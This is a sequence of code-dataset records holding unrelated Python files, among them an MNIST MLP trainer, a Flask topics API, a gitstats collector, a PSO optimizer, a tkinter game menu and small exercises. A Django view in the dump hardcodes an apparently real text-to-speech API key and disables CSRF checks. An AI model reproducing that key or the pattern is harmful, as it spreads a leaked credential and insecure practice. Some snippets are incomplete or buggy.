process\r\nif new_dimensions == 784:\r\n training = np.reshape(training_images,(training_length,column*row))\r\n validation = np.reshape(validation_images,(validation_length,column*row))\r\n testing = np.reshape(testing_images,(testing_length,column*row))\r\n tr_labels = ChangeLabelstoDec(training_labels,training_length) \r\n va_labels = ChangeLabelstoDec(validation_labels,validation_length) \r\n te_labels = ChangeLabelstoDec(testing_labels,testing_length)\r\n p1 = fig.add_subplot(*[6,1,1])\r\n p1.imshow(training_images[0,:,:], cmap='gray')\r\n new_training = training/255\r\n new_validation = validation/255\r\n new_testing = testing/255\r\nelse:\r\n if choice == 1:\r\n training = np.array(np.reshape(training_images,(training_length,column*row)))\r\n validation = np.array(np.reshape(validation_images,(validation_length,column*row)))\r\n testing = np.reshape(testing_images,(testing_length,column*row))\r\n tr_labels = ChangeLabelstoDec(training_labels,training_length) \r\n va_labels = ChangeLabelstoDec(validation_labels,validation_length) \r\n te_labels = ChangeLabelstoDec(testing_labels,testing_length)\r\n whole_data = np.row_stack([training,validation])\r\n pca = PCA(n_components=new_dimensions,whiten=\"true\")\r\n whole_pca = pca.fit_transform(whole_data/255)\r\n new_training = whole_pca[0:50000,:]\r\n new_validation = whole_pca[50000:,:]\r\n display = np.around(np.reshape(new_training[0,:],(new_row,new_col))*255)\r\n p1 = fig.add_subplot(*[6,1,1])\r\n p1.imshow(display, cmap='gray')\r\n 
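# choice == 2: shrink the 28x28 images to 14x14 by block-average downsampling instead of PCA\r\n    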
else:\r\n if choice == 2:\r\n new_training = np.zeros([training_length,new_row,new_col])\r\n new_validation = np.zeros([validation_length,new_row,new_col])\r\n new_testing = np.zeros([testing_length,new_row,new_col])\r\n for i in range(training_length):\r\n g = downsample(np.reshape(training_images[i,:,:],(row,column)),shrink)\r\n new_training[i,:,:] = np.reshape(g,(1,new_row,new_col))\r\n for i in range(validation_length):\r\n g = downsample(np.reshape(validation_images[i,:,:],(row,column)),shrink)\r\n new_validation[i,:,:] = np.reshape(g,(1,new_row,new_col))\r\n for i in range(testing_length):\r\n g = downsample(np.reshape(testing_images[i,:,:],(row,column)),shrink)\r\n new_testing[i,:,:] = np.reshape(g,(1,new_row,new_col))\r\n tr_labels = ChangeLabelstoDec(training_labels,training_length) \r\n va_labels = ChangeLabelstoDec(validation_labels,validation_length) \r\n te_labels = ChangeLabelstoDec(testing_labels,testing_length)\r\n p1 = fig.add_subplot(*[6,1,1])\r\n p1.imshow(new_training[0,:,:], cmap='gray')\r\n new_training = np.array(np.reshape(new_training,(training_length,new_col*new_row)))/255\r\n new_validation = np.array(np.reshape(new_validation,(validation_length,new_col*new_row)))/255\r\n new_testing = np.reshape(testing_images,(testing_length,column*row))/255\r\n \r\n#%%\r\np2 = fig.add_subplot(*[6,1,2])\r\nb = np.zeros(10)\r\nt = np.arange(iteration)\r\nJ = np.zeros(iteration)\r\nw1 = np.random.randn(new_dimensions+1,hidden_dimensions)*0.1\r\nw2 = np.random.randn(hidden_dimensions+1,output_dimensions)*0.1\r\nfor i in range(iteration):\r\n mini_t = np.zeros([batch_size,new_dimensions])\r\n mini_l = np.zeros([batch_size,output_dimensions])\r\n for k in range(batch_iteration):\r\n old_order = np.array(np.arange(0,batch_size,1))\r\n new_order = np.zeros(batch_size)\r\n new_order = random.sample(old_order.tolist(),batch_size)\r\n for j in range(batch_size):\r\n index = int(new_order[j])\r\n mini_t[j,:] = new_training[k*batch_size+index,:]\r\n mini_l[j,:] = tr_labels[k*batch_size+index,:]\r\n error = MLP_Learning(mini_t,mini_l,1,step,dropout,mo) \r\n J[i] = np.trace((error.T@error)/(2*validation_length))\r\nOut = MLP(new_validation,1,dropout)\r\nanswer = np.argmax(Out, axis=1)\r\ncount = 0\r\nfor j in range(validation_length):\r\n if answer[j] == validation_labels[j]:\r\n count = count + 1\r\naccuracy = count/validation_length\r\nprint(accuracy)\r\np2.plot(t,J,'b')\r\n \r\nw1 = np.random.randn(new_dimensions+1,hidden_dimensions)*0.1\r\nw2 = np.random.randn(hidden_dimensions+1,output_dimensions)*0.1\r\nmoment = 0\r\nstep = 0.05\r\nfor i in range(iteration):\r\n mini_t = np.zeros([batch_size,new_dimensions])\r\n mini_l = np.zeros([batch_size,output_dimensions])\r\n for k in range(batch_iteration):\r\n old_order = np.array(np.arange(0,batch_size,1))\r\n new_order = np.zeros(batch_size)\r\n new_order = random.sample(old_order.tolist(),batch_size)\r\n for j in range(batch_size):\r\n index = int(new_order[j])\r\n mini_t[j,:] = new_training[k*batch_size+index,:]\r\n mini_l[j,:] = tr_labels[k*batch_size+index,:]\r\n error = MLP_Learning(mini_t,mini_l,1,step,dropout,mo) \r\n J[i] = np.trace((error.T@error)/(2*validation_length))\r\nOut = MLP(new_validation,1,dropout)\r\nanswer = np.argmax(Out, axis=1)\r\ncount = 0\r\nfor j in range(validation_length):\r\n if answer[j] == validation_labels[j]:\r\n count = count + 1\r\naccuracy = 
count/validation_length\r\nprint(accuracy)\r\np2.plot(t,J,'r')","sub_path":"project/momentum3.py","file_name":"momentum3.py","file_ext":"py","file_size_in_byte":10287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"48384641","text":"from tkinter import N\nimport requests\nimport json\n\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\n\n\n@csrf_exempt\ndef text_to_speed(request):\n if (request.method == 'POST'):\n payload = request.body\n url = 'https://api.fpt.ai/hmi/tts/v5'\n\n headers = {\n 'api-key': 'cnnvqSxKkxOHXwJvkff681tgU7O8Gi0B',\n 'speed': '',\n 'voice': 'banmai'\n }\n\n response = requests.request('POST', url, data=payload, headers=headers)\n\n rs = json.loads(response.text)\n\n return JsonResponse(rs, safe=False)\n","sub_path":"tdai/api/views/view_fpt.py","file_name":"view_fpt.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"80241969","text":"# Polynomial Regression\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('Position_Salaries.csv')\r\nX = dataset.iloc[:, 1:2].values\r\ny = dataset.iloc[:, -1].values\r\n\r\n#building a simple linear reg model\r\nfrom sklearn.linear_model import LinearRegression\r\nlin_reg = LinearRegression()\r\nlin_reg.fit(X,y)\r\n\r\n#building a polynomial regression model\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 4)\r\nX_poly = poly_reg.fit_transform(X)\r\nlin_reg2 = LinearRegression()\r\nlin_reg2.fit(X_poly,y) \r\n\r\n#visualizing the linear regression results\r\nplt.scatter(X,y, color = 'red')\r\nplt.plot(X,lin_reg.predict(X), color = 'blue')\r\nplt.title('Linear Regression Model')\r\nplt.xlabel('Experience')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n\r\n#visualizing the polynomial regression results\r\nX_grid = np.arange(min(X), max(X), 0.1)\r\nX_grid = X_grid.reshape((len(X_grid), 1))\r\nplt.scatter(X,y, color = 'red')\r\nplt.plot(X,lin_reg2.predict(poly_reg.fit_transform(X)), color = 'blue')\r\nplt.title('Polynomial Regression Model')\r\nplt.xlabel('Experience')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n\r\n#Predicting the result using lin reg\r\nlin_reg.predict([[9]]) #years of experience\r\n\r\n#Predicting the result using poly reg\r\nlin_reg2.predict(poly_reg.fit_transform([[9]]))\r\n","sub_path":"Final_polyreg.py","file_name":"Final_polyreg.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"88951384","text":"# -*- coding: utf-8 -*-\n\nfrom flask import request, g, current_app\nfrom flask_restplus import Namespace, Resource, abort\nfrom ..serializers.topics import topic_post_model, topic_put_model, topic_container_model, topic_model\nfrom app.models import Topic\nfrom app.extensions import db\n\n\nns = Namespace('topics', description='Topic related operation')\n\n\n# ================================================================================================\n# ENDPOINTS\n# ================================================================================================\n#\n# API topics endpoints\n#\n# ================================================================================================\n\n\n@ns.route('/')\nclass TopicCollection(Resource):\n\n 
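# collection endpoint: GET lists every topic, POST adds one (topic names must be unique)\n\n    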
@ns.marshal_with(topic_container_model)\n    def get(self):\n        \"\"\"\n        Return topic list\n        \"\"\"\n        return {'topics': [t for t in Topic.query.all()]}\n\n    @ns.marshal_with(topic_model)\n    @ns.expect(topic_post_model)\n    def post(self):\n        \"\"\"\n        Add topic\n        \"\"\"\n        data = request.json\n\n        if Topic.query.filter_by(name=data['name']).first() is not None:\n            abort(400, error='Name already exists')\n\n        t = Topic(name=data['name'])\n        db.session.add(t)\n        db.session.commit()\n\n        return t\n\n\n@ns.route('/<int:id>')\n@ns.response(404, 'Topic not found.')\nclass TopicItem(Resource):\n\n    @ns.marshal_with(topic_model)\n    def get(self, id):\n        \"\"\"\n        Get topic\n        \"\"\"\n        return Topic.query.get_or_404(id)\n\n    @ns.marshal_with(topic_model)\n    @ns.expect(topic_put_model)\n    def put(self, id):\n        \"\"\"\n        Update topic\n        \"\"\"\n        t = Topic.query.get_or_404(id)\n        data = request.json\n\n        ft = Topic.query.filter_by(name=data['name']).first()\n\n        # the new name may not be in use at all, so guard against ft being None\n        if ft is not None and ft.id != t.id:\n            abort(400, error='Name already exists.')\n\n        t.name = data['name']\n\n        db.session.add(t)\n        db.session.commit()\n\n        return t\n\n    @ns.response(204, 'Topic successfully deleted.')\n    def delete(self, id):\n        \"\"\"\n        Delete topic\n        \"\"\"\n        t = Topic.query.get_or_404(id)\n\n        db.session.delete(t)\n        db.session.commit()\n\n        return 'Topic successfully deleted.', 204\n","sub_path":"app/api/endpoints/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"491978422","text":"import re\n\nfrom gitstats.RunExternal import RunExternal\nfrom gitstats.collector.StatisticsCollector.StatisticsCollectorStrategy import StatisticsCollectorStrategy\nfrom gitstats.model.Author import Author\n\n\nclass AuthorStrategy(StatisticsCollectorStrategy):\n    def __init__(self, data, conf):\n        super().__init__(data, conf)\n\n    def collect(self):\n        # defined for stamp, author only if author committed at this timestamp.\n        self.data.changes_by_date_by_author = {} # stamp -> author -> 
lines_added\n\n # Similar to the above, but never use --first-parent\n # (we need to walk through every commit to know who\n # committed what, not just through mainline)\n lines = RunExternal.execute(\n ['git log --shortstat --date-order --pretty=format:\"%%at %%aN\" %s' % (self.get_log_range('HEAD'))]).split(\n '\\n')\n lines.reverse()\n inserted = 0\n deleted = 0\n stamp = 0\n for line in lines:\n if len(line) == 0:\n continue\n\n # \n if re.search(r'files? changed', line) is None:\n pos = line.find(' ')\n if pos != -1:\n try:\n old_stamp = stamp\n (stamp, author_name) = (int(line[:pos]), line[pos + 1:])\n author_name = self.get_merged_author(author_name)\n if old_stamp > stamp:\n # clock skew, keep old timestamp to avoid having ugly graph\n stamp = old_stamp\n if author_name not in self.data.authors.keys():\n self.data.authors[author_name] = Author(author_name)\n author = self.data.authors[author_name]\n self.data.add_commit(author, stamp)\n author.lines_added += inserted\n author.lines_removed += deleted\n if stamp not in self.data.changes_by_date_by_author:\n self.data.changes_by_date_by_author[stamp] = {}\n if author not in self.data.changes_by_date_by_author[stamp]:\n self.data.changes_by_date_by_author[stamp][author] = {}\n self.data.changes_by_date_by_author[stamp][author]['lines_added'] = author.lines_added\n self.data.changes_by_date_by_author[stamp][author]['commits'] = author.commits\n files, inserted, deleted = 0, 0, 0\n except ValueError:\n print('Warning: unexpected line \"%s\"' % line)\n else:\n print('Warning: unexpected line \"%s\"' % line)\n else:\n numbers = self.get_stat_summary_counts(line)\n\n if len(numbers) == 3:\n (files, inserted, deleted) = [int(el) for el in numbers]\n else:\n print('Warning: failed to handle line \"%s\"' % line)\n (files, inserted, deleted) = (0, 0, 0)\n","sub_path":"gitstats/collector/StatisticsCollector/AuthorStrategy.py","file_name":"AuthorStrategy.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"130430166","text":"from tkinter import *\r\nfn1 = Tk()\r\nfn1.title('La Bombe - Menu')\r\nimport random\r\n\r\nfn1.configure(width=1187,height=695)\r\nfn1.resizable(width=False,height=False)\r\nfn1.rowconfigure(0,weight=1)\r\nfn1.columnconfigure(0,weight=1)\r\n\r\nreturne=PhotoImage(file='return1.gif')\r\nphoto1=PhotoImage(file='plaque2.gif')\r\ntextexit=PhotoImage(file='textexit1.gif')\r\nLogo=PhotoImage(file='logo1.gif')\r\nrules=PhotoImage(file='carules1.gif')\r\nphoto2=PhotoImage(file='viseur2.gif')\r\nphoto3=PhotoImage(file='touche1.gif')\r\nLumi=PhotoImage(file='lumi1.gif')\r\nGO=PhotoImage(file='go1.gif')\r\n\r\ncan= Canvas(fn1,width=1187,height=695,bg='dark grey')\r\ncan.create_image(595,350, image=photo1)\r\ncan.create_image(950,570, image=textexit, tag='a1')\r\ncan.create_image(595,350, image=Logo, tag='a2')\r\ncan.create_image(212,550, image=rules, tag='a3')\r\ncan.create_image(1075,120, image=Lumi)\r\ncan.grid(sticky=NSEW)\r\n\r\ndef changer4(event):\r\n command = fn.destroy()\r\ndef delete(MonTag):\r\n can.delete(can.find_withtag(MonTag))\r\n\r\ndef changer1(event):\r\n command = fn1.destroy()\r\n\r\ndef changerfe1(event):\r\n if can.find_withtag('a3'):\r\n delete('a1')\r\n delete('a2')\r\n delete('a3')\r\n fn1.title('La Bombe - les règles')\r\n can.create_image(975,570, image=returne, tag='c1')\r\n can.create_text(593,115,text=\"Sur le sujet de la mémoire\", fill='red', font=\"Times 50 bold\")\r\n can.create_text(360,210,text=\"La 
mémoire est une chose fragile,\", fill='black', font=\"Times 25 bold\")\r\n can.create_text(470,265,text=\"mais tout le reste l'est aussi lorsqu'une bombe explose,\", font=\"Times 20\")\r\n can.create_text(280,310,text=\"donc fais attention !\", font=\"Times 20\")\r\n can.create_text(510,365,text=\"Appuyez sur le bouton correct pour passer au module suivant.\", font=\"Times 20\")\r\n can.create_text(465,420,text=\"Compléter toutes les étapes pour désarmer le module.\", font=\"Times 20\")\r\n can.create_text(378,465,text=\"En appuyant sur un bouton incorrect,\", font=\"Times 20\")\r\n can.create_text(338,510,text=\" le module est remis à l'étape 1.\", font=\"Times 20\")\r\n can.grid(row=0,column=0, sticky='NSEW')\r\n can.tag_bind(\"c1\", \"\", changer4)\r\n\r\ndef changerfe2(event):\r\n if can.find_withtag('a2'):\r\n delete('a2')\r\n delete('a3')\r\n fn1.title('La Bombe - le jeu')\r\n can.create_image(450,300, image=photo2)\r\n can.create_image(225,585, image=photo3)\r\n can.create_image(335,585, image=photo3)\r\n can.create_image(445,585, image=photo3)\r\n can.create_image(555,585, image=photo3)\r\n can.create_image(665,585, image=photo3)\r\n can.create_text(225,580, text='1', fill='red', font=\"Times 50 bold\")\r\n can.create_text(335,580, text='2', fill='red', font=\"Times 50 bold\")\r\n can.create_text(445,580, text='3', fill='red', font=\"Times 50 bold\")\r\n can.create_text(555,580, text='4', fill='red', font=\"Times 50 bold\")\r\n can.create_text(665,580, text='5', fill='red', font=\"Times 50 bold\")\r\n can.create_image(950,328, image=GO, tag='de')\r\n can.grid(row=0,column=0, sticky='NSEW')\r\n can.tag_bind('de', \"\", changerAZ)\r\n\r\ncan.tag_bind(\"a1\", \"\", changer1)\r\ncan.tag_bind(\"a2\", \"\", changerfe2)\r\ncan.tag_bind(\"a3\", \"\", changerfe1)\r\n\r\nfn1.mainloop()","sub_path":"projet bombe/les py + traduction/phase 2.py","file_name":"phase 2.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"354470726","text":"import tensorflow as tf\n\nfrom tensorflow.keras import datasets, layers, models\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport os\n\n\ndef loadModel():\n new_model = models.load_model('model3.h5')\n new_model.summary()\n return new_model\n\ndef showGrayImage(image):\n plt.figure(1)\n plt.imshow(image[:,:,0], cmap='gray')\n plt.show()\n\ndef openImage(url):\n img_raw = tf.io.read_file(url)\n\n img = tf.image.decode_image(img_raw)\n img = tf.image.resize(img, [28,28])\n img = tf.image.rgb_to_grayscale(img)\n img = img.numpy()\n\n return img\n\ndef predict(model, image):\n img_pre = image.reshape(-1, 28, 28, 1) / 255.0\n img_pre.shape\n\n pre = model.predict(img_pre)\n return pre\n\ndef plot_pre(pre):\n plt.grid(False)\n plt.xticks(range(10))\n plt.yticks([])\n thisplot = plt.bar(range(10), pre, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(pre)\n thisplot[predicted_label].set_color('blue')\n for i in range(10):\n plt.text(i, pre[i], '%.1f %%' % (pre[i]*100), ha='center', va='bottom')\n\n plt.figure(1)\n plt.show()\n\ndef start(url):\n img = openImage(url)\n showGrayImage(img)\n \n model = loadModel()\n res = predict(model, img)\n plot_pre(res[0])\n\n print(res)\n print(np.argmax(res))\n\nif __name__ == \"__main__\":\n start('number_test/2(1).jpg')","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
+{"seq_id":"261715871","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"aiotus\",\n version=\"0.1.3\",\n author=\"Jens Steinhauser\",\n author_email=\"jens.steinhauser@gmail.com\",\n description=\"Asynchronous tus (tus.io) client library\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/JenSte/aiotus\",\n project_urls={\"Documentation\": \"https://aiotus.readthedocs.io\"},\n license=\"Apache 2\",\n packages=setuptools.find_packages(),\n package_data={\"aiotus\": [\"py.typed\"]},\n include_package_data=True,\n zip_safe=False,\n entry_points={\n \"console_scripts\": [\n \"aiotus-upload=aiotus.entrypoint:aiotus_upload\",\n \"aiotus-metadata=aiotus.entrypoint:aiotus_metadata\",\n ]\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Development Status :: 4 - Beta\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Typing :: Typed\",\n ],\n python_requires=\">=3.7\",\n install_requires=[\"aiohttp\", \"tenacity\"],\n setup_requires=[\"setuptools_scm\"],\n use_scm_version={\"local_scheme\": \"dirty-tag\"},\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"603916106","text":"import numpy as np\n\nimport entropy.utils as utils\nfrom entropy.CountMotif_nr import countMotifs\nfrom entropy.Entropy import graphEntropy\nfrom entropy.countedge import countEdge\nfrom entropy.edge_entropy import edgeEntropy\n\n\ndef writeEdgeEntropy(graphfile):\n if graphfile.endswith(\".xlsx\"):\n graphfile=utils.translata_xlsx_to_csv(graphfile)\n print('转变格式成功')\n A, nodN = utils.read_adjMatrix_csv(graphfile)\n print('A\\n'+str(A))\n temp=countEdge(A,nodN)\n print('count_edge\\n'+str(temp))\n return edgeEntropy(graphEntropy(countMotifs(A,nodN),nodN),temp)\n #return countEdge(A,nodN)\n\n#print(writeEdgeEntropy('./data/graph11.xlsx'))\n\ndef writeEdgeAttribute(graph_ids,adj):\n edge_entropys=[]\n # build graphs with nodes\n edge_index=0\n node_index_begin=0\n for g_id in set(graph_ids):\n print('正在处理图:'+str(g_id))\n node_ids = np.argwhere(graph_ids == g_id).squeeze()\n node_ids.sort()\n\n temp_nodN=len(node_ids)\n temp_A=np.zeros([temp_nodN,temp_nodN],int)\n\n edge_index_begin=edge_index\n\n while (edge_index c:\n break\n elif prev == c:\n equal.append(int(c))\n if i == (len(code_str) - 1):\n for e in equal:\n if equal.count(e) == 1:\n ok = True\n prev = c\n if ok:\n num += 1\n debug.append(code)\n print(f\"{debug}\")\n return num\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('input', help=\"File containing day 4 input data\")\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_arguments()\n Day4(args.input)\n","sub_path":"2019/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"196527212","text":"# -*- coding: utf-8 -*-\nimport unittest\n\nfrom bson.objectid import ObjectId\nfrom mock import patch\n\nfrom advapp import create_app, AppConfig\nfrom advauth.userauth import AuthService\nfrom models import connection\n\nclass 
AdvAuthActionsTest(unittest.TestCase):\n\n def setUp(self):\n test = self\n username = 'test user: {0}'.format(repr(self))\n test_user = dict(name=username, chances=222)\n self.database = connection()\n self.user_id = str(self.database.accounts.insert(test_user))\n class TestWebClient(object):\n def receive_tokens(self, code):\n return dict(access_token='test_access_token')\n def user_info(self, access_token):\n return dict(id=test.user_id, username=username)\n self.webclient_mock = TestWebClient()\n class TestConf(AppConfig):\n TESTING = True\n self.app = create_app(TestConf).test_client()\n\n def tearDown(self):\n self.database.accounts.remove(ObjectId(self.user_id))\n\n def test_process_code(self):\n with patch.object(AuthService, 'webclient', self.webclient_mock):\n resp = self.app.get('/oauth2/redirect?code=test_auth_code')\n self.assertEquals(resp.status_code, 302)\n","sub_path":"tests/advauth/advauth_test.py","file_name":"advauth_test.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"74151620","text":"def wrap(width, text):\n # VARIABLES\n str_line = \"\" \n str_lines = \"\" \n \n for word in text.split():\n if (len(str_line) + len(word) + 1 < width):\n str_line = str(str_line) + str(word) + \" \"\n else:\n str_lines += str(str_line + \"\\n\")\n str_line = str(word) + \" \"\n \n str_lines += str(str_line + \"\\n\")\n str_lines = str_lines[:-2]\n return str_lines\n\ndef printWrapped(width, text):\n print(wrap(width, text))\n\ndef header(headerName):\n print(\"===============================================================================\")\n print(headerName)\n print(\"===============================================================================\")\n\ndef invertWords(string):\n invertedString = []\n string = string.split()\n for i in range(len(string), 0, -1):\n invertedString.append(string[i-1])\n return invertedString\n ","sub_path":"MT_Texts.py","file_name":"MT_Texts.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"162026443","text":"from .base import BaseEA\nfrom eas import EA\nimport numpy as np\nfrom eas.helper import init_vector\nfrom copy import deepcopy\n\n\n# paper\n# Shi, Y., & Eberhart, R. C. (1999, July). Empirical study of particle swarm optimization.\n# In Proceedings of the 1999 Congress on Evolutionary Computation-CEC99 (Cat. No. 99TH8406) (Vol. 3, pp. 
1945-1950).\n# IEEE.\nclass PSO(EA):\n    def __init__(self, *args, vlb=None, vub=None, **kwargs):\n        super(PSO, self).__init__(*args, **kwargs)\n        self.vlb = vlb if vlb else ([-5] * self.n)\n        self.vub = vub if vub else ([5] * self.n)\n\n        self.vc = np.array([init_vector(self.n, self.vub, self.vlb) for _ in range(self.np)])\n        # self.vcg = lambda cg: self.vc - self.vc * cg / self.max_gen\n        # track each particle's personal best\n        self.psc = deepcopy(self.sc)\n        # parameter generation\n        self.wg = lambda cg: 0.9 - cg * 0.4 / self.max_gen\n        self.r1g = lambda: 0.05\n        self.r2g = lambda: 0.05\n\n    def run(self, g):\n        w = self.wg(g)\n        r1 = self.r1g()\n        r2 = self.r2g()\n\n        for i in range(self.np):\n            # update velocity\n            # print(self.vc[i])\n            for j in range(self.n):\n                ir1, ir2 = np.random.random(2)\n                # self.sc[0,j] is always the current global best\n                self.vc[i,j] = w * self.vc[i,j] + \\\n                               r1 * ir1 * (self.psc[i,j] - self.sc[i,j]) + \\\n                               r2 * ir2 * (self.sc[0,j] - self.sc[i,j])\n\n            self.vc[i] = self.bs(self.vc[i], self.vub, self.vlb)\n\n            s_new = self.sc[i] + self.vc[i]\n            s_new = self.bs(s_new, self.ub, self.lb)\n\n            if not self.better_than(i, s_new):\n                self.sc[i] = s_new\n                # record the particle's personal best\n                if not self.better_than(i, self.psc[i]):\n                    self.psc[i] = deepcopy(self.sc[i])\n\n    def sort(self):\n        flag = 1 if self.optimal_minimal else -1\n        self.fc = self.equip_procedure_all()\n        sorted_indexes = np.argsort(flag * self.fc)\n        self.sc = self.sc[sorted_indexes]\n        self.psc = self.psc[sorted_indexes]\n        self.vc = self.vc[sorted_indexes]\n        self.fc = self.fc[sorted_indexes]","sub_path":"eas/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"213255445","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Python program to find the maximum for each\n# and every contiguous subarray of size k\n\nfrom collections import deque\n\n# A Deque (Double ended queue) based method for printing \n# maximum element of all subarrays of size k\ndef printMax (arr, n, k):\n    \"\"\" Create a Double Ended Queue, Qi that will store indexes\n    of array elements. The queue will store indexes of largest\n    elements in every window and it will maintain decreasing\n    order of values from front to rear in Qi, i.e.\n    arr [Qi.front ()] to arr [Qi.rear ()] are in decreasing order\"\"\"\n    Qi = deque ()\n    # Process first k (or first window) elements of array\n    for i in range (k):\n        # Remove all elements smaller than current element to add\n        while Qi and arr [i] >= arr [Qi [-1]]: Qi.pop ()\n        # Add new element at rear of queue\n        Qi.append (i)\n    # Process rest of the elements, i.e. 
from arr [k] to arr [n-1]\n    for i in range (k, n):\n        # front queue element is largest of previous window → print it\n        print (str (arr [Qi [0]]) + \" \", end = \"\")\n        # Remove the elements which are out of current window\n        while Qi and Qi [0] <= i - k: Qi.popleft ()\n        # Remove all elements smaller than current element to add\n        while Qi and arr [i] >= arr [Qi [-1]]: Qi.pop ()\n        # Add current element at the rear of Qi\n        Qi.append (i)\n    # Print the maximum element of last window\n    print (str (arr [Qi [0]]))\n    \n# Driver program to test above functions\ndef main ():\n    arr = [12, 1, 78, 90, 57, 89, 56]\n    k = 3\n    printMax (arr, len (arr), k)\nif __name__ == \"__main__\":\n    main () \n# This code is contributed by Shiv Shankar\n\n","sub_path":"2017/hackerrank/max_queue_of_shifting_contiguos_subarray.py","file_name":"max_queue_of_shifting_contiguos_subarray.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"125886242","text":"# section05-2\n# Python flow control (loops)\n# Loop practice\n\n# The heart of coding -> handling conditions well is key\n\n# Basic loops: for, while\n\nv1 = 1\nwhile v1 < 11:\n    print(\"v1 is : \", v1)\n    v1 += 1\n\nfor v2 in range(10):\n    print(\"v2 is :\", v2)\n\nfor v3 in range(1, 11):\n    print(\"v3 is :\", v3)\n\n# 1-100 sum\nsum1 = 0\ncnt1 = 1\nwhile cnt1 <= 100:\n    sum1 += cnt1\n    cnt1 += 1\nprint(\"1~100 : \", sum1)\nprint(\"1~100 : \", sum(range(1, 101)))\nprint(\"1~100 :\", sum(range(1, 101, 2)))\n\n# Iterating over sequence (ordered) types\n# strings, lists, tuples, sets, dictionaries\n# functions that return iterables: range, reversed, enumerate, filter, map, zip\n\nnames = [\"Kim\", \"Park\", \"Cho\", \"Choi\", \"Yoo\"]\n\nfor name in names:\n    print(name, end=\" \")\n\nprint()\nword = \"dreams\"\nfor s in word:\n    print(\"word : \", s)\n\nmy_info = {\n    \"name\": \"Kim\",\n    \"age\": 33,\n    \"city\": \"Seoul\"\n}\n\n# by default, iteration is over keys\nfor key in my_info:\n    print(\"my_info\", key)\n\n# values\nfor key in my_info.values():\n    print(\"my_info\", key)\n\n# keys\nfor key in my_info.keys():\n    print(\"my_info\", key)\n\n# keys and values\nfor k, v in my_info.items():\n    print(\"my_info\", k, v)\n\nname = \"KennRY\"\n\nfor n in name:\n    if n.isupper():\n        print(n.lower())\n    else:\n        print(n.upper())\n\n# break\nnumbers = list(range(1, 6))\nfor num in numbers:\n    if num == 3:\n        print(num)\n        break\n\n\n# continue\nfor num in numbers:\n    if num == 3:\n        print(num)\n        continue\n","sub_path":"section05-2.py","file_name":"section05-2.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"329444079","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 6 18:07:18 2019\n\n@author: sinsakuokazaki\n\"\"\"\n\nclass Node:\n    def __init__(self, data = None, next_node = None):\n        self.data = data\n        self.next_node = next_node\n    \n    def append(self, data):\n        end = Node()\n        end.data = data\n        while self.next_node:\n            self = self.next_node\n        self.next_node = end\n    def __str__(self):\n        return str(self.data)\n    \nnode = Node(\"a\")\nnode.append(\"b\")\nnode.append(\"c\")\nnode.append(\"d\")\nnode.append(\"e\")\nnode.append(\"f\")\nnode.append(\"g\")\n\n#delete an element in middle of linked list\ndef deleteElement(node):\n    if node == None or node.next_node == None:\n        return False\n    \n    nextNode = node.next_node\n    node.data = nextNode.data\n    node.next_node = nextNode.next_node\n    \nresult = deleteElement(node.next_node)\n\nwhile node.next_node:\n    print(node)\n    node = 
